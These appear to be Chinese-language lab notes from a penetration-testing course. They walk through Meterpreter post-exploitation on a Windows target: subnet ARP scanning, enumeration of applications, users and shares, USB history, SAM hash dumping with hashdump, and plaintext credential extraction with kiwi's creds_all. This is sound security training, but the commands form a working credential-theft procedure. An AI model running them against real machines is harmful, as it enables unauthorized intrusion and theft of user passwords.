一、存活主机发现
步骤1、使用arp查看缓冲表:
meterpreter > arp

步骤2、局域网内存活主机发现:
meterpreter >
run post/windows/gather/arp_scanner RHOSTS=172.16.0.0/24

二、应用程序枚举
方法1: 获取靶机上的软件安装信息
meterpreter > run post/windows/gather/enum_applications

靶机上安装百度网盘应用后再检测:

方法2: 获取靶机最近访问过的文档、链接等信息
meterpreter >
run post/windows/gather/dumplinks

三、查看最近登录的用户
meterpreter > run post/windows/gather/enum_logged_on_users

四、查看共享文件
靶机上查看共享:

kail攻击机上:
meterpret >
run post/windows/gather/enum_shares

五、查看用户hash
机制:从SAM数据库导出密码的哈希
方法1:
hashdump

方法2:
meterpreter > run post/windows/gather/hashdump

得到用户的密码与对应的hash值。
六、查看usb历史记录
meterpreter > run post/windows/gather/usb_history

没有usb设备使用记录。
给靶机添加一个usb设备:


此时,再查看usb历史记录:

七、获取用户明文认证信息
加载模块:
meterpret > load kiwi

查看指令集:
help

获取所有认证信息
:creds_all

八、参考
4-30 后渗透测试实验 - 主机敏感信息泄露防御_哔哩哔哩_bilibili
4-31 Windows系统后渗透测试常用模块 - 主机发现_哔哩哔哩_bilibili
4-32 Windows系统后渗透测试常用模块 - 应用程序枚举_哔哩哔哩_bilibili
4-33 Windows系统后渗透测试常用模块 - 收集信息_哔哩哔哩_bilibili
4-35 Windows后渗透测试插件-获取用户明文认证信息_哔哩哔哩_bilibili